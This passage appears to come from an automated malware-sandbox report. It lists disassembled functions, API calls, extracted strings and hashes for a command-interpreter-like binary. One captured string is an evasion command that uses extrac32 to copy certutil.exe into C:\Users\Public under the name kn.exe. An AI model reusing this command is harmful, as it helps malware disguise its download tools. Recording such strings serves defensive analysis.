                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Heap$AllocProcessmemmovewcstol$_wcsnicmplongjmp
                                        • String ID:
                                        • API String ID: 1051989028-0
                                        • Opcode ID: 64565f03666b4bb772596797247e6bb6fdde89d50adaa5f7e3853eb5f84ddd48
                                        • Instruction ID: decc04c4d01f198012f99e1d8eb5b41492c030187bd622946785b75ccbd2c4f3
                                        • Opcode Fuzzy Hash: 64565f03666b4bb772596797247e6bb6fdde89d50adaa5f7e3853eb5f84ddd48
                                        • Instruction Fuzzy Hash: 0F027122B0EB8186EA24AF15E844279F6A5FB85BE4F944131DFAD43794EF3CE641C710
                                        Function 00007FF7CD4886B0 Relevance: 18.1, APIs: 8, Strings: 4, Instructions: 138memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Heap$_wcsicmp$AllocProcess
                                        • String ID: DISABLEDELAYEDEXPANSION$DISABLEEXTENSIONS$ENABLEDELAYEDEXPANSION$ENABLEEXTENSIONS
                                        • API String ID: 3223794493-3086019870
                                        • Opcode ID: d222a0f06bbbc582554831b5995f9d518337be47592992ae4180831db5f06540
                                        • Instruction ID: 0ffe4b1291e5888e2e7688b67602be77c25072ee032d1fb69f647d5d7abe934a
                                        • Opcode Fuzzy Hash: d222a0f06bbbc582554831b5995f9d518337be47592992ae4180831db5f06540
                                        • Instruction Fuzzy Hash: AD517125B0CA4285EA54AF16A814179FBA1FB59BA0F945135CF7E433A1FF3CE241C720
                                        Function 00007FF7CD492B94 Relevance: 18.1, APIs: 6, Strings: 6, Instructions: 110COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: EQU$GEQ$GTR$LEQ$LSS$NEQ
                                        • API String ID: 0-3124875276
                                        • Opcode ID: 27546f26981fd3a6242742626cf9575fc19742bdde1af1eb23768a0abe577f48
                                        • Instruction ID: 86ada32b701a3edca5bb7f70183c4b47970475f55b8d9ab07f8d376b454ca28d
                                        • Opcode Fuzzy Hash: 27546f26981fd3a6242742626cf9575fc19742bdde1af1eb23768a0abe577f48
                                        • Instruction Fuzzy Hash: 27519120B0D94396FB147F22A444679B69AAF55774FC04135DF2E462A5FF3CA2058760
                                        Function 00007FF7CD4ABFEC Relevance: 17.9, APIs: 3, Strings: 7, Instructions: 444COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00007FF7CD4958E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF7CD4AC6DB), ref: 00007FF7CD4958EF
                                          • Part of subcall function 00007FF7CD49081C: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7CD49084E
                                        • towupper.MSVCRT ref: 00007FF7CD4AC1C9
                                        • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7CD4AC31C
                                        • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0 ref: 00007FF7CD4AC5CB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: CriticalDriveEnterEnvironmentFreeLocalSectionTypeVariabletowupper
                                        • String ID: %s $%s>$PROMPT$Unknown$\$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe $x
                                        • API String ID: 2242554020-619615743
                                        • Opcode ID: 4a922d4c85f00677817b5c761d16b1de45b4041caf2284929607811bb1d70d1e
                                        • Instruction ID: 95190af248963e60d002f8bbf3379f3ae96c09707d2fea4c74a5c42bba80982b
                                        • Opcode Fuzzy Hash: 4a922d4c85f00677817b5c761d16b1de45b4041caf2284929607811bb1d70d1e
                                        • Instruction Fuzzy Hash: B6125F25B0C65281EAA4AF15A45417AE6A1EF44BB0FD44235EFBE027E4EE3CE641C724
                                        Function 00007FF7CD496FB4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 148COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 00007FF7CD497013
                                        • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7CD497123
                                          • Part of subcall function 00007FF7CD491EA0: wcschr.MSVCRT(?,?,?,00007FF7CD48286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF7CD4B0D54), ref: 00007FF7CD491EB3
                                        • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7CD49706E
                                        • wcsncmp.MSVCRT ref: 00007FF7CD4970A5
                                        • wcsstr.MSVCRT ref: 00007FF7CD49F9DB
                                        • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7CD49FA00
                                        • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7CD49FA5F
                                          • Part of subcall function 00007FF7CD49823C: FindFirstFileExW.KERNELBASE ref: 00007FF7CD498280
                                          • Part of subcall function 00007FF7CD49823C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7CD49829D
                                          • Part of subcall function 00007FF7CD493A0C: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF7CD4AEAC5,?,?,?,00007FF7CD4AE925,?,?,?,?,00007FF7CD48B9B1), ref: 00007FF7CD493A56
                                        • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7CD49FA3D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: File$AttributesFindmemset$CloseDriveErrorFirstFullLastNamePathTypewcschrwcsncmpwcsstr
                                        • String ID: \\.\
                                        • API String ID: 799470305-2900601889
                                        • Opcode ID: 7ea5b237473074eb8a3c93ab886d3958f76363502f2a90bc42476f967ba8e34b
                                        • Instruction ID: 1e7cc45096b769b126ce6e8c30eb3e08a669c48094220a8cbe5c124f3c990e04
                                        • Opcode Fuzzy Hash: 7ea5b237473074eb8a3c93ab886d3958f76363502f2a90bc42476f967ba8e34b
                                        • Instruction Fuzzy Hash: CA51DB31B0CA8286EB60AF12E401ABDB7A6FB85BA4F854135DF5D07794EF3CD6458310
                                        Function 00007FF7CD488B20 Relevance: 16.8, APIs: 11, Instructions: 254COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: _wcsicmpwcschr$AttributesErrorFileLastwcsrchr
                                        • String ID:
                                        • API String ID: 1944892715-0
                                        • Opcode ID: b04fd89d1b32d74b41568e07ffd85bc9ccdf1354646f06c8d836b15a263e4c9a
                                        • Instruction ID: 6e41c1d011781c49192646e35267747026cd4141f1cee06d5ab4b23a27a50418
                                        • Opcode Fuzzy Hash: b04fd89d1b32d74b41568e07ffd85bc9ccdf1354646f06c8d836b15a263e4c9a
                                        • Instruction Fuzzy Hash: 33B18D21B0DA4286EA60BF52A854179F6A5FF55BA0FC48135CF6E87395FF3CE6408720
                                        Function 00007FF7CD485458 Relevance: 16.7, APIs: 11, Instructions: 213fileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00007FF7CD493578: _get_osfhandle.MSVCRT ref: 00007FF7CD493584
                                          • Part of subcall function 00007FF7CD493578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7CD4832E8,?,?,?,?,?,?,?,?,0000000A,?,00000000,00000014), ref: 00007FF7CD49359C
                                          • Part of subcall function 00007FF7CD493578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7CD4832E8,?,?,?,?,?,?,?,?,0000000A,?,00000000,00000014), ref: 00007FF7CD4935C3
                                          • Part of subcall function 00007FF7CD493578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7CD4832E8,?,?,?,?,?,?,?,?,0000000A,?,00000000,00000014), ref: 00007FF7CD4935D9
                                          • Part of subcall function 00007FF7CD493578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7CD4832E8,?,?,?,?,?,?,?,?,0000000A,?,00000000,00000014), ref: 00007FF7CD4935ED
                                          • Part of subcall function 00007FF7CD493578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7CD4832E8,?,?,?,?,?,?,?,?,0000000A,?,00000000,00000014), ref: 00007FF7CD493602
                                        • _get_osfhandle.MSVCRT ref: 00007FF7CD4854DE
                                        • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(?,?,00007FF7CD481F7D), ref: 00007FF7CD48552B
                                        • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00007FF7CD481F7D), ref: 00007FF7CD48554F
                                        • _get_osfhandle.MSVCRT ref: 00007FF7CD4A345F
                                        • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF7CD481F7D), ref: 00007FF7CD4A347E
                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF7CD481F7D), ref: 00007FF7CD4A34C3
                                        • _get_osfhandle.MSVCRT ref: 00007FF7CD4A34DB
                                        • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF7CD481F7D), ref: 00007FF7CD4A34FA
                                          • Part of subcall function 00007FF7CD4936EC: _get_osfhandle.MSVCRT ref: 00007FF7CD493715
                                          • Part of subcall function 00007FF7CD4936EC: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF7CD493770
                                          • Part of subcall function 00007FF7CD4936EC: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7CD493791
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: _get_osfhandle$ConsoleWrite$File$ByteCharLockModeMultiSharedWide$AcquireHandleReleaseTypewcschr
                                        • String ID:
                                        • API String ID: 1356649289-0
                                        • Opcode ID: 0c4a37dfe8b9f6674b9d741f685a90a2de3626c6216cde8b4183c3294efd6170
                                        • Instruction ID: c1e70caea03f0fecf0d5986efe186078b614a0d23a9d4a0b5a4a57d37c6f20de
                                        • Opcode Fuzzy Hash: 0c4a37dfe8b9f6674b9d741f685a90a2de3626c6216cde8b4183c3294efd6170
                                        • Instruction Fuzzy Hash: 64916F32B0CA4297E724AF55A404579F6E6FB88BA4F884135DF6E43754EF3CE6448B20
                                        Function 00007FF7CD4A86FC Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 226timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: LocalTime$ErrorLast_get_osfhandle
                                        • String ID: %s$/-.$:
                                        • API String ID: 1644023181-879152773
                                        • Opcode ID: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
                                        • Instruction ID: e3d4d9ca030e3dd7ab4349f6768e18e0359e114650b94093bab6ea9c4c24d5be
                                        • Opcode Fuzzy Hash: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
                                        • Instruction Fuzzy Hash: 26917062B0C64296EF14AF65D4402B9E6A1FF84BA4FC44036DF6E46694FE3CE746C720
                                        Function 00007FF7CD4A627C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 95synchronizationCOMMON
                                        Download Yara Rule
                                        APIs
                                        • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7CD4A7251), ref: 00007FF7CD4A628E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: ObjectSingleWait
                                        • String ID: wil
                                        • API String ID: 24740636-1589926490
                                        • Opcode ID: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
                                        • Instruction ID: c1a5643916b3f65453a3fb75d115c81a5fee84c2f47e3e39f8e025539825f153
                                        • Opcode Fuzzy Hash: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
                                        • Instruction Fuzzy Hash: A6415021B0CD4283F3606F55E40427AB6A2EF957A0FE08131DF2E466D4EF3DEA498721
                                        Function 00007FF7CD4ACDC0 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 94windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: FormatMessage$ByteCharFreeLocalMultiWide_ultoa
                                        • String ID: $Application$System
                                        • API String ID: 3377411628-1881496484
                                        • Opcode ID: 80d38d575318b3867918aa38a6e3db8ef172391286b4c5249a392e05da5dfb20
                                        • Instruction ID: 36c887a77c0770c4085969aa83eb26ec81e5fa7a27cd020fdd10891fa7c270e8
                                        • Opcode Fuzzy Hash: 80d38d575318b3867918aa38a6e3db8ef172391286b4c5249a392e05da5dfb20
                                        • Instruction Fuzzy Hash: 9F417B32B08F429AE710AFA1E8403EDB7A5FB89758F845135DE5E42B98EF38D245C750
                                        Function 00007FF7CD4814E8 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 64COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: AttributesDirectoryFileRemove$ErrorFullLastNamePath
                                        • String ID: :$\
                                        • API String ID: 3961617410-1166558509
                                        • Opcode ID: 7382dc9ba5dd15d1d826e80cca2a433ebb6210e0cfd6d3e104106e7a41e883e1
                                        • Instruction ID: 211f8755724541149b3e9a2fed10ca77a2337e470fd7c5bba59b3b256f3baa1a
                                        • Opcode Fuzzy Hash: 7382dc9ba5dd15d1d826e80cca2a433ebb6210e0cfd6d3e104106e7a41e883e1
                                        • Instruction Fuzzy Hash: 1C216521B0CA42D6E7506F65A844079F692EB5A7A4BC44132DF2F82794EF3CE6458720
                                        Function 00007FF7CD487AA0 Relevance: 15.2, APIs: 10, Instructions: 221COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: CreateDirectoryDriveFullNamePathTypememset
                                        • String ID:
                                        • API String ID: 1397130798-0
                                        • Opcode ID: 53223a99652f8e81a4eeb04428d23ca491e991d1bc8129b69f2a7ec7696704bc
                                        • Instruction ID: 3ed01021f312f1b4842f9bc815fe1aab97610ed01205ce321e8b16a9192a42ef
                                        • Opcode Fuzzy Hash: 53223a99652f8e81a4eeb04428d23ca491e991d1bc8129b69f2a7ec7696704bc
                                        • Instruction Fuzzy Hash: 5091A322B0CB8196EA65BF1198516B9F3A6FB44BA4F848035DF5E43794FF3CE6408720
                                        Function 00007FF7CD49258C Relevance: 15.1, APIs: 5, Strings: 5, Instructions: 85COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00007FF7CD4906C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7CD48B4DB), ref: 00007FF7CD4906D6
                                          • Part of subcall function 00007FF7CD4906C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7CD48B4DB), ref: 00007FF7CD4906F0
                                          • Part of subcall function 00007FF7CD4906C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7CD48B4DB), ref: 00007FF7CD49074D
                                          • Part of subcall function 00007FF7CD4906C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7CD48B4DB), ref: 00007FF7CD490762
                                        • _wcsicmp.MSVCRT ref: 00007FF7CD4925CA
                                        • _wcsicmp.MSVCRT ref: 00007FF7CD4925E8
                                        • _wcsicmp.MSVCRT ref: 00007FF7CD49260F
                                        • _wcsicmp.MSVCRT ref: 00007FF7CD492636
                                        • _wcsicmp.MSVCRT ref: 00007FF7CD492650
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: _wcsicmp$Heap$AllocProcess
                                        • String ID: CMDEXTVERSION$DEFINED$ERRORLEVEL$EXIST$NOT
                                        • API String ID: 3407644289-1668778490
                                        • Opcode ID: 73bc52d87adb43f98016766748090f79ae3978062519f174c0f235f90d2ce4d7
                                        • Instruction ID: 8023178bf802ae78e0c72e059524a2a329476c2d6d002f2c25ce1bb2ece559fc
                                        • Opcode Fuzzy Hash: 73bc52d87adb43f98016766748090f79ae3978062519f174c0f235f90d2ce4d7
